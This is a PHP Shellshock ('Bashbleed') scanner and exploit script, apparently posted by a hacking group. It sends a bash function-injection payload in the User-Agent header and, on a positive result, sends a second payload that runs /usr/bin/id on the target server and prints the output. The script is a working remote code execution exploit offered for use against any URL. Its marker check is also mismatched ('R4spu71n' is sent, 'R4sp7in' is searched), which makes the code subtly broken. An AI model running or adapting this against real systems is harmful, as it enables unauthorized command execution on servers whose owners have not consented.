[PHP] Bashbleed / Shellshock Scanner

1. <?php
2. error_reporting(E_ALL ^ E_NOTICE);
3. /*
4.  
5. ==[ Bashbleed / Shellshock - Scanner ]==
6.  
7.  
8. ███╗ ██╗███████╗██╗ ██╗ ██████╗██████╗ ███████╗██╗ ██╗
9. ████╗ ██║██╔════╝██║ ██║ ██╔════╝██╔══██╗██╔════╝██║ ██║
10. ██╔██╗ ██║█████╗ ██║ █╗ ██║█████╗██║ ██████╔╝█████╗ ██║ █╗ ██║
11. ██║╚██╗██║██╔══╝ ██║███╗██║╚════╝██║ ██╔══██╗██╔══╝ ██║███╗██║
12. ██║ ╚████║███████╗╚███╔███╔╝ ╚██████╗██║ ██║███████╗╚███╔███╔╝
13. ╚═╝ ╚═══╝╚══════╝ ╚══╝╚══╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚══╝╚══╝ .net
14. [ Written by Rasputin ~ visit new-crew.net]
15.  
16. Usage: php5 <scriptname>.php <target>
17.  
18. Example:
19. $ php5 bashbleed_scanner.php vulnsite.vuln
20. [*] Bashbleed FOUND !!!
21. [*] uid=33(www-data) gid=33(www-data) groups=33(www-data)
22. [*] The server responded: 500
23. $
24.  
25. ///////////////////////////////////////////////////////////////////////////
26. DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
27. Version 2, December 2004
28.  
29. Copyright (C) 2004 Sam Hocevar
30. 14 rue de Plaisance, 75014 Paris, France
31. Everyone is permitted to copy and distribute verbatim or modified
32. copies of this license document, and changing it is allowed as long
33. as the name is changed.
34.  
35. DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
36. TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
37.  
38. 0. You just DO WHAT THE FUCK YOU WANT TO.
39. ///////////////////////////////////////////////////////////////////////////
40.  
41. */
42.  
43. $ch = curl_init(); // create cURL handle (ch)
44. if (!$ch) {
45. die("[!] Couldn't initialize a cURL handle");
46. }
47. if( $argv[1] ){
48. // set some cURL options
49. $ret = curl_setopt($ch, CURLOPT_URL, "$argv[1]");
50. $ret = curl_setopt($ch, CURLOPT_HEADER, 0);
51. $ret = curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
52. $ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
53. $ret = curl_setopt($ch, CURLOPT_USERAGENT, "() { foo;};echo 'R4spu71n'");
54. $ret = curl_setopt($ch, CURLOPT_TIMEOUT, 30);
55.  
56. // execute
57. $ret = curl_exec($ch);
58.  
59. if (empty($ret)) {
60. // some kind of an error happened
61. die("[!] " . curl_error($ch)."\n");
62. curl_close($ch); // close cURL handler
63. } else {
64. $info = curl_getinfo($ch);
65. curl_close($ch); // close cURL handler
66. if (empty($info['http_code'])) {
67. die("No HTTP code was returned");
68. } else {
69. // load the HTTP codes
70. $pos = strpos($ret, "R4sp7in");
71. if( ($pos) || ($info['http_code'] == "500") ) {
72. echo "[*] Bashbleed FOUND !!!\n";
73. $ch2 = curl_init();
74. $ret2 = curl_setopt($ch2, CURLOPT_URL, "$argv[1]");
75. $ret2 = curl_setopt($ch2, CURLOPT_HEADER, 0);
76. $ret2 = curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, 1);
77. $ret2 = curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
78. $ret2 = curl_setopt($ch2, CURLOPT_USERAGENT, "() { foo;};echo;/usr/bin/id");
79. $ret2 = curl_setopt($ch2, CURLOPT_TIMEOUT, 30);
80. $ret2 = curl_exec($ch2);
81. echo "[*] " . $ret2;
82. curl_close($ch2); // close cURL handler
83. }
84. else
85. echo "[!] No Vulnerabilities Found\n";
86. // echo results
87. echo "[*] The server responded: ";
88. echo $info['http_code'] . "\n";
89.  
90. }
91.  
92. }
93. }
94. else {
95. echo "Target-URL?\n";
96. echo "Usage: " . $argv[0] . " <Target-URL>\n";
97. }
98. ?>